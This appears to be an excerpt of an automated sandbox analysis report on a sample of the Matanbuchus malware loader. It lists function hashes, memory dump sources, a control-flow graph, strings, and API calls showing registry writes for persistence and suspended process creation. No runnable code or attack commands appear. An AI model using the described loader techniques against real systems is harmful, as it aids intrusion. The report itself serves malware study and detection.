                          • Opcode Fuzzy Hash: 4c1eab5970cad5bb778bd9befc4fd4b303cf43b4b0819ed0f1a60980bec7a5fb
                          • Instruction Fuzzy Hash: DA9190B8E05219DFCB08CF99D4A0AADFBB2FF49304F208199D819AB745D735A941CF50
                          Function 7EF24430 Relevance: .2, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02510fa4ddcc40002b41ec08a4154023d6121cc6ad1b2a63791fc30a8c19f5a2
                          • Instruction ID: d6a2f313ce0ff56445f0e1919263596581ffe4e081067dede1bb143743768bce
                          • Opcode Fuzzy Hash: 02510fa4ddcc40002b41ec08a4154023d6121cc6ad1b2a63791fc30a8c19f5a2
                          • Instruction Fuzzy Hash: 1B81B1B8E05249DFCB04CFA9C490AADFBB5BF48304F248169D859AB745D735A942CF90
                          Function 7EF53150 Relevance: .2, Instructions: 158COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3b8d71ed562dd4e341cb6740745bf84566a667071f26c71fdcafb569e23361f
                          • Instruction ID: be39727337ce585e9df485b38678156396c28cd71ad1ef0bc2b4630754666baf
                          • Opcode Fuzzy Hash: f3b8d71ed562dd4e341cb6740745bf84566a667071f26c71fdcafb569e23361f
                          • Instruction Fuzzy Hash: F3518F76E01219EFDF05CF99C950AAEBBB2FF88310F19845DE805AB345C7349A50CBA4
                          Function 7EF16DF0 Relevance: .2, Instructions: 156COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                          • Instruction ID: 7ddb9084ebefb5655d44312387ddbeabbabe0ce1b3434fe74f8c9238032fc9fd
                          • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                          • Instruction Fuzzy Hash: 97818F78E05259DFCB04CF99C590AEDFBB1BF48304F20819AE855AB345D734AA85CF94
                          Function 7EF1709A Relevance: .1, Instructions: 146COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                          • Instruction ID: 2b1c9a459e4ea135e6de4b01300763463407fdd52a361832df04550a7a7826b3
                          • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                          • Instruction Fuzzy Hash: 13719178E00259CFCB18CF99C490AEDFBB2BF89310F248199E859A7755D774A982CF50
                          Function 7EF21CA0 Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7f06e0b756b3738925b886ea3f5f532933d1f2902601309f52d1adc5058e23e
                          • Instruction ID: de0f30647b9a89863cb88ef89320d31c00bd88b550c5831cedcaeb7618dd02dd
                          • Opcode Fuzzy Hash: f7f06e0b756b3738925b886ea3f5f532933d1f2902601309f52d1adc5058e23e
                          • Instruction Fuzzy Hash: F7619078E04659DFCB04CF99C490AADFBB6FF88304F20816AD855AB355D730AA41CF54
                          Function 7EF346E0 Relevance: .1, Instructions: 134COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8c469c0f059664ea4d87ccfa01e93c0f5d0381e0c635f7cfa9adb321424bdf8
                          • Instruction ID: 69f07b00cb0c0b2b0a45652bdaceb6af2a79b1fadf0c86cd1ec5ae0cf92b1c62
                          • Opcode Fuzzy Hash: d8c469c0f059664ea4d87ccfa01e93c0f5d0381e0c635f7cfa9adb321424bdf8
                          • Instruction Fuzzy Hash: 96619FB8E04259DFCB04CFA9C490AADFBF1BF49304F24815AD815AB745D734AA42CF90
                          Function 7EF383B0 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                          • Instruction ID: 532d914e841c88ac57357cd2db736c965194e65536ad52d69ce6b5ef80244fbc
                          • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                          • Instruction Fuzzy Hash: 9F619D78E05259DFCB08CF99C590AADFBF2BF48304F24819AD815AB745D734AA41CF90
                          Function 7EF4EB40 Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction ID: a84d972bf0901867be44f0799e2b9b7a5f6141746f49e58042d3e3a2b7ec8d8a
                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                          • Instruction Fuzzy Hash: C311987F241191C3E705892ED4F4BA6AFEAFAD7232B29637BD043CFE58D12291459600
                          Function 7EF6467B Relevance: .0, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1386c6d2ee232ee394527a7f01d130c71a346f90cccf96890af4b33ce53c8704
                          • Instruction ID: bcee315a13d4c88b0491e9c872ce06af62c0e409d37d2a5ae3c822a2ae8312f8
                          • Opcode Fuzzy Hash: 1386c6d2ee232ee394527a7f01d130c71a346f90cccf96890af4b33ce53c8704
                          • Instruction Fuzzy Hash: F2F0903A654224DBC712FA5D9538B99F7FCF705B14F110256E602DBEA4C6A2DE4087C4
                          Function 7EF4C270 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96c021c13fd54b173c1d8bbef0e8e843ad7d40f7737c88c1f2b3ca5334f97305
                          • Instruction ID: 196012e2a8bcbe4eff07dd58d7d3bec262e206b96b9adaf2a1c5a74f00518ae4
                          • Opcode Fuzzy Hash: 96c021c13fd54b173c1d8bbef0e8e843ad7d40f7737c88c1f2b3ca5334f97305
                          • Instruction Fuzzy Hash: 76F02D7A500208DBEB61DFA5CC54FCBB7FCEB91210F002951E555A3811D770FA408A90
                          Function 7EF64606 Relevance: .0, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fe75b45c117c74acfb25d8e611710b3bb80060be2b5c4bb08e6f3b68fd129a3e
                          • Instruction ID: afd2507e017fbfb6d5e67eab4f57aa3f3f7dfcce2050070e7c24db2f249ec2e4
                          • Opcode Fuzzy Hash: fe75b45c117c74acfb25d8e611710b3bb80060be2b5c4bb08e6f3b68fd129a3e
                          • Instruction Fuzzy Hash: 54F03976A202A5EBDB22EA4CC514A89B3FCEB45B54F214096E502E7A41CAB4DE00CBD0
                          Function 7EF6464A Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                          • Instruction ID: 2a67d21c45633d3dd0a6cc9b9bd6b223c38913d778bdb96c5192a158bd89e57c
                          • Opcode Fuzzy Hash: 743f8f6ed7d3dafc849b8407b333ca00744b702c402de91a5cb1d0c5c83d8951
                          • Instruction Fuzzy Hash: C1E08C32915228EBCB10EB88C92098AF3FCFB44B14B114497F502D3510C2B0EE00C7C4
                          Function 7EF5D438 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b71919ba0385f4a8fc00f2e514dbeba694445a5405f75bd256c70b69ca15c05e
                          • Instruction ID: d0b7384478303b55c0f299950ef720c756c45a05838bf33a8e3550d5465ff443
                          • Opcode Fuzzy Hash: b71919ba0385f4a8fc00f2e514dbeba694445a5405f75bd256c70b69ca15c05e
                          • Instruction Fuzzy Hash: 8BC08C3C002984C7CE06991082B0BB733BAB3A1786F8048AEC43B0BF41C51FA882DB02
                          Function 7EF1D700 Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                          • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                          • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                          • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                          Function 7EF3B7B0 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                          • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                          • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                          • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                          Function 6CC69C40 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                          • Instruction ID: be7eecee3400b42b3e558a840de4aeb97e4223185f45bdd8b65d759b642826a8
                          • Opcode Fuzzy Hash: a4738e9d22b7a670e957569a9947fd17b9771784ab9a70797d5a1e1428e800be
                          • Instruction Fuzzy Hash: 85A002321A5B8CC7C612A68DA651B51B3ECE348D54F440461A50D43E015659B9108495
                          Function 7EF5B91E Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 402COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1344 7ef5b91e-7ef5b969 call 7ef62e6d 1347 7ef5bdf3-7ef5bdff call 7ef5212f 1344->1347 1348 7ef5b96f-7ef5b980 call 7ef62e62 1344->1348 1348->1347 1353 7ef5b986-7ef5b997 call 7ef62e62 1348->1353 1353->1347 1356 7ef5b99d-7ef5b9f0 call 7ef4c137 GetModuleHandleExW GetModuleFileNameW 1353->1356 1359 7ef5b9f2-7ef5ba09 call 7ef62e6d 1356->1359 1360 7ef5ba0f-7ef5ba17 1356->1360 1359->1347 1359->1360 1362 7ef5ba1a-7ef5ba27 1360->1362 1362->1362 1364 7ef5ba29-7ef5ba33 1362->1364 1365 7ef5ba35-7ef5ba5e call 7ef5568a 1364->1365 1366 7ef5ba64-7ef5ba71 call 7ef62e62 1364->1366 1365->1347 1365->1366 1366->1347 1371 7ef5ba77-7ef5ba88 call 7ef62e62 1366->1371 1371->1347 1374 7ef5ba8e-7ef5ba9f call 7ef62e62 1371->1374 1374->1347 1377 7ef5baa5-7ef5baad 1374->1377 1378 7ef5bab0-7ef5babd 1377->1378 1378->1378 1379 7ef5babf-7ef5bac9 1378->1379 1380 7ef5bdd3 1379->1380 1381 7ef5bacf-7ef5bad1 1379->1381 1383 7ef5bdd9-7ef5bddf 1380->1383 1382 7ef5bad4-7ef5bae1 1381->1382 1382->1382 1384 7ef5bae3-7ef5bb00 1382->1384 1385 7ef5bcfe-7ef5bd0a call 7ef62e62 1383->1385 1386 7ef5bb35-7ef5bb42 1384->1386 1387 7ef5bb02-7ef5bb0e 1384->1387 1385->1347 1400 7ef5bd10-7ef5bd22 call 7ef62e62 1385->1400 1389 7ef5bb44-7ef5bb47 1386->1389 1390 7ef5bb8e 1386->1390 1391 7ef5bb10-7ef5bb14 1387->1391 1395 7ef5bb4d-7ef5bb60 call 7ef62fbe 1389->1395 1396 7ef5bd6b-7ef5bd7a call 7ef62fbe 1389->1396 1390->1396 1397 7ef5bb94-7ef5bbaf call 7ef62fbe 1390->1397 1392 7ef5bb16-7ef5bb18 1391->1392 1393 7ef5bb2c-7ef5bb2f 1391->1393 1392->1393 1398 7ef5bb1a-7ef5bb2a 1392->1398 1393->1386 1395->1347 1410 7ef5bb66-7ef5bb77 call 7ef62e62 1395->1410 1396->1347 1408 7ef5bd7c-7ef5bd8d call 7ef62e62 1396->1408 1397->1347 1407 7ef5bbb5-7ef5bbc6 call 7ef62e62 1397->1407 1398->1391 1398->1393 1400->1347 1413 7ef5bd28-7ef5bd39 call 7ef62e62 1400->1413 1407->1347 1419 7ef5bbcc-7ef5bbd8 1407->1419 1408->1347 1420 7ef5bd8f-7ef5bdad call 7ef62fbe 1408->1420 1410->1347 1422 7ef5bb7d-7ef5bb8c 1410->1422 1413->1347 1425 7ef5bd3f-7ef5bd4c call 7ef62e62 1413->1425 1423 7ef5bbdb-7ef5bbe8 call 7ef62e62 1419->1423 1420->1347 1430 7ef5bdaf-7ef5bdc0 call 7ef62e62 1420->1430 1422->1423 1423->1347 1432 7ef5bbee-7ef5bbff call 7ef62e62 1423->1432 1425->1347 1434 7ef5bd52-7ef5bd63 call 7ef62e62 1425->1434 1430->1347 1440 7ef5bdc2-7ef5bdcb 1430->1440 1432->1347 1442 7ef5bc05-7ef5bc16 call 7ef62e62 1432->1442 1434->1347 1441 7ef5bd69-7ef5bdf2 call 7ef4dd68 1434->1441 1440->1380 1442->1347 1448 7ef5bc1c-7ef5bc20 1442->1448 1449 7ef5bc23-7ef5bc2c 1448->1449 1449->1449 1450 7ef5bc2e-7ef5bc34 1449->1450 1451 7ef5bc37-7ef5bc44 1450->1451 1451->1451 1452 7ef5bc46-7ef5bc62 call 7ef62d78 1451->1452 1452->1347 1455 7ef5bc68-7ef5bc79 call 7ef62e62 1452->1455 1455->1347 1458 7ef5bc7f-7ef5bc90 call 7ef62e62 1455->1458 1458->1347 1461 7ef5bc96-7ef5bc9a 1458->1461 1462 7ef5bc9d-7ef5bca6 1461->1462 1462->1462 1463 7ef5bca8-7ef5bcb8 1462->1463 1464 7ef5bcbb-7ef5bcc8 1463->1464 1464->1464 1465 7ef5bcca-7ef5bcd3 1464->1465 1465->1383 1466 7ef5bcd9-7ef5bcf3 call 7ef62fbe 1465->1466 1466->1347 1469 7ef5bcf9 1466->1469 1469->1385
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7EF5B9C4
                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7EF5B9E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Module$FileHandleName
                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                          • API String ID: 4146042529-3261600717
                          • Opcode ID: 0d4d98cd37def54295d9cdee24e6c03657d92c3c17ac60fc2ac1e166f55ee552
                          • Instruction ID: d63dcf6929a0f8b57e8b3382425876ea34ef9e8772f7e71f3fe0feffc698c885
                          • Opcode Fuzzy Hash: 0d4d98cd37def54295d9cdee24e6c03657d92c3c17ac60fc2ac1e166f55ee552
                          • Instruction Fuzzy Hash: C6C1F579A0421AE7D7115F35DC68FEB72B9FFB6300F4405A9EC0696B09F7309B418AA1
                          Function 7EEFC450 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EEFC52E, 7EEFC6D4
                          • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7EEFC533
                          • @, xrefs: 7EEFC6BD
                          • d, xrefs: 7EEFC64C
                          • d, xrefs: 7EEFC590
                          • n_chars < number_buffer.size() - 1, xrefs: 7EEFC6D9
                          • d, xrefs: 7EEFC6F5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                          • API String ID: 3758378126-3644039597
                          • Opcode ID: 72da584f11b19baedfd5b60637f00687bd2897d844e70a729d49afb1343e9fa3
                          • Instruction ID: 837052506fa017048f2ca687dda0c53a1a07502d98546946238fa1cf16d804f3
                          • Opcode Fuzzy Hash: 72da584f11b19baedfd5b60637f00687bd2897d844e70a729d49afb1343e9fa3
                          • Instruction Fuzzy Hash: D2F1E678D04219DFDB54CF98D890BDDBBB1BF48304F20899AD91AAB344D774AA84CF58
                          Function 7EEFC900 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                          • API String ID: 3839614884-178659603
                          • Opcode ID: 76485794fe378e16f755cc8fc7505b49c29ed9c8ba3cfd9c271306e32f61e2c1
                          • Instruction ID: bf123b19c28a0088d57a1ac222e04d412cc47e16a02ef57926911f2641264482
                          • Opcode Fuzzy Hash: 76485794fe378e16f755cc8fc7505b49c29ed9c8ba3cfd9c271306e32f61e2c1
                          • Instruction Fuzzy Hash: 82E1C278E04619DFDB54CF99C890B9DBBB1FF48304F2089AAD91AA7354D7306A84CF58
                          Function 7EF4BB70 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7EF4BB99
                          • wsprintfW.USER32 ref: 7EF4BBE6
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7EF4BC03
                          • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7EF4BC24
                          • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7EF4BC44
                          • RegCloseKey.ADVAPI32(00000000), ref: 7EF4BC5D
                          • RegCloseKey.ADVAPI32(00000000), ref: 7EF4BC68
                            • Part of subcall function 7EF4C347: GetTickCount.KERNEL32 ref: 7EF4C365
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CountCreateOpenTickwsprintf
                          • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                          • API String ID: 730945307-550109914
                          • Opcode ID: 629fcc265edaf9851974d062c0db92ff8cd3fd3019f2b477db10ae18aac13710
                          • Instruction ID: 6950d697c736b3f3d4b59ae3cc6898374590dc3d3f5e5d3901bb36dddff8f5c4
                          • Opcode Fuzzy Hash: 629fcc265edaf9851974d062c0db92ff8cd3fd3019f2b477db10ae18aac13710
                          • Instruction Fuzzy Hash: D3316976A00219FAEB119B95CC99FEFBFBDEF09354F400465F609A6460D7309B84DBA0
                          Function 7EF3C6B0 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 367COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$M_plus.e <= kGamma$M_plus.e >= kAlpha$d$d$d <= 9$p1 > 0$p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10$p2 > delta
                          • API String ID: 0-2564281896
                          • Opcode ID: cee6bd289ccce299ff2a9978b71f0a39b419d15746211754a42a0716db219aa8
                          • Instruction ID: d9f0b16915812262a5697407f63fe3cb5ffcf8fc733efbe1d5d0ec0830061b1f
                          • Opcode Fuzzy Hash: cee6bd289ccce299ff2a9978b71f0a39b419d15746211754a42a0716db219aa8
                          • Instruction Fuzzy Hash: AAF10C79E04208EFDB04CF98D8A1ADDBBB2FF48304F60855AE919AB744D7346A41CF55
                          Function 7EF4BD7C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?), ref: 7EF4BDA9
                          • IsWow64Process.KERNEL32(00000000), ref: 7EF4BDB0
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7EF4BDEC
                          • wsprintfW.USER32 ref: 7EF4BE7A
                          • CloseHandle.KERNEL32(00000000), ref: 7EF4C005
                          • CloseHandle.KERNEL32(00000000), ref: 7EF4C010
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                          • String ID: 0x%x$?
                          • API String ID: 3386633596-4137330559
                          • Opcode ID: be59a2b325cd6e21cebc74d86280ea6c07aa53538ffa0a915570803761683024
                          • Instruction ID: 2e6ab6fe7b80dde04f7cac5b3304646fe98d574646877fb91ab9ce2b99c881c2
                          • Opcode Fuzzy Hash: be59a2b325cd6e21cebc74d86280ea6c07aa53538ffa0a915570803761683024
                          • Instruction Fuzzy Hash: FA814BB6D04108FFEF019EE5CD91EFEBABDEF09254F105466E90AE2551EA319E008B60
                          Function 6CC6BC50 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 374COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID: D__ExceptionPtrCopy$K$Request for author$nv$|
                          • API String ID: 0-2977880545
                          • Opcode ID: 6a943e723d05462264b23a934d8152496b171346689aee6a0be14f64edae570b
